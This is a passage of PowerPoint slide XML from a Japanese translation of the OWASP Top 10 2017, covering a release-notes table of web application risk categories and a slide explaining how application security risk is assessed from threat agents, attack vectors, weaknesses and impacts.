                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>機能レベルのアクセス制御の不足</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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A4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>とマージ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</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A7</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:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>クロスサイトスクリプティング</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>クロスサイトリクエストフォージェリ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (CSRF)</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7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A8:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>安全でないデシリアライゼーション</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>コミュニティ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a: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8"/>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A9 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>既知の脆弱性のあるコンポーネントの使用</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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>既知の脆弱性のあるコンポーネントの使用</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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>未検証のリダイレクトと転送</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>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A10:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>不十分なロギングとモニタリング</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>コミュニティ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</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18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ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>リリースノート</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2652647" y="8190079"/>
            <a:ext cx="93040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747200"/>
            <a:ext cx="615948" cy="427153"/>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252381629"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6858000" cy="4328503"/>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7372">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>アプリケーションセキュリティリスクについて</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="105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991063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>攻撃者はアプリケーションを介して様々な経路で、ビジネスや組織に被害を及ぼします。それぞれの経路は、注意を喚起すべき深刻なリスクやそれほど深刻ではないリスクを表しています。</a:t>
                      </a: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ts val="1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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>これらの経路の中には、検出や悪用がしやすいものもあれば、しにくいものもあります。同様に、引き起こされる被害についても、ビジネスに影響がないこともあれば、破産にまで追い込まれることもあります。組織におけるリスクを判断するためにまず、それぞれの「脅威エージェント」、「攻撃手法」、「セキュリティ上の弱点」などに関する可能性を評価し、組織に対する「技術面への影響」と「ビシネス面への影響」を考慮してみてください。最後に、これら全てのファクターに基づき、リスクの全体像を決定してください。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="124464" y="1755286"/>
            <a:ext cx="6481383" cy="2117594"/>
            <a:chOff x="124464" y="2084709"/>
            <a:chExt cx="6481383" cy="2106291"/>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攻撃</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7" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="124464" y="2089173"/>
              <a:ext cx="877163"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脅威</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP"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エージェント</a:t>
              </a:r>
              <a:endParaRPr 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影響</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攻撃</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41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1306682" y="2140195"/>
              <a:ext cx="646331" cy="193885"/>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攻撃手法</a:t>
              </a:r>
              <a:endParaRPr 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42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2677734" y="2084709"/>
              <a:ext cx="877163" cy="304858"/>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rPr>
                <a:t>セキュリティ</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>上の弱点</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4568356" y="2099966"/>
              <a:ext cx="761747"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技術面への</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP"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影響</a:t>
              </a:r>
              <a:endParaRPr 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44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5613268" y="2089173"/>
              <a:ext cx="992579"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ビジネス面への</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP"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影響</a:t>
              </a:r>
              <a:endParaRPr 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攻撃</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影響</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影響</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資産</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機能</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資産</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制御</a:t>
              </a:r>
              <a:endParaRPr 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制御</a:t>
              </a:r>
              <a:endParaRPr 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制御</a:t>
              </a:r>
              <a:endParaRPr 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565250" y="2103168"/>
              <a:ext cx="877163" cy="296504"/>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セキュリティ</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP"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制御</a:t>
              </a:r>
              <a:endParaRPr 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p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textplatzhalter 17"/>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t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションセキュリティリスク</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 177"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1052241432"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5268034"/>
          <a:ext cx="4509120" cy="4637966"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4509120">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3374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b="1" i="0" u="sng" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>あなた</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>にとってのリスク</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300473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、多様な組織のために、最も重大なウェブアプリケーションセキュリティリスクを特定することに焦点を当てています。これらのリスクに関して、以下に示す</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に基づいた格付手法により、発生可能性と技術面への影響について評価します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100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ct val="100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ct val="100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ct val="100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ct val="100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a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>この版ではこの版において、リスクの発生頻度や影響度を算出する、リスク格付の体系を更新しています。詳細は、「</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>リスクに関する注記</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>」を参照してください。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>各組織はユニークであるため、侵害において脅威を引き起こすアクター、目標、影響度も各組織でユニークでしょう。公共の利益団体において公開情報を</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CMS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>により管理している場合や、医療システムにおいてセンシティブな健康記録を管理するために同じような</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CMS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>を利用している場合に、同じソフトウェアであっても脅威を引き起こすアクターやビジネスへの影響は大きく異なります。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>そのため、脅威エージェントやビジネスへの影響に基づき、組織におけるリスクを理解することが重要です。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>におけるリスクは、理解の促進及び混乱を招くことを避けるため、可能な限り</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
